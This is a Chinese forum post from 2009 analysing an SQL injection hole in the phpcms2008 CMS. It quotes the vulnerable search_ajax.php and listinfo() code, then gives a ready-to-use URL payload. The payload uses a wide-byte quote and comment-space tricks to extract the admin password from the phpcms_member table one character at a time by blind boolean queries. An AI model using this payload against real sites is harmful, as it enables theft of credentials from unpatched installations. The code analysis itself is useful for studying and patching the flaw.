子丰 發表於 2009-4-15 00:39:44

phpcms2008 注入漏洞 利用分析

这个是最新有人发现的 <br /><br />该漏洞文件:ask/search_ajax.php <br /><br />漏洞说明: <br />/ask/search_ajax.php <br />Code: <br /><br />if($q) <br />{ <br />$where = &quot; title LIKE '%$q%' AND status = 5&quot;;//没做过滤直接感染了$where <br />} <br />else <br />{ <br />exit('null'); <br />} <br />$infos = $ask-&gt;listinfo($where, 'askid DESC', '', 10); <br />/ask/include/answer.class.php <br />Code: <br /><br />function listinfo($where = '', $order = '', $page = 1, $pagesize = 50) <br />{ <br />if($where) $where = &quot; WHERE $where&quot;; <br />if($order) $order = &quot; ORDER BY $order&quot;; <br />$page = max(intval($page), 1); <br />$offset = $pagesize*($page-1); <br />$limit = &quot; LIMIT $offset, $pagesize&quot;; <br />$r = $this-&gt;db-&gt;get_one(&quot;SELECT count(*) as number FROM $this-&gt;table_posts $where&quot;); <br />$number = $r['number']; <br />$this-&gt;pages = pages($number, $page, $pagesize); <br />$array = array(); <br />$i = 1; <br />$result = $this-&gt;db-&gt;query(&quot;SELECT * FROM $this-&gt;table_posts $where $order $limit&quot;); <br />while($r = $this-&gt;db-&gt;fetch_array($result)) <br />{ <br />$r['orderid'] = $i; <br />$array[] = $r; <br />$i++; <br />} <br />$this-&gt;number = $this-&gt;db-&gt;num_rows($result); <br />$this-&gt;db-&gt;free_result($result); <br />return $array; <br />} <br />测试方法:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode1"> <br />/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)&gt;52%23 <br /></div><br />
頁: [1]
查看完整版本: phpcms2008 注入漏洞 利用分析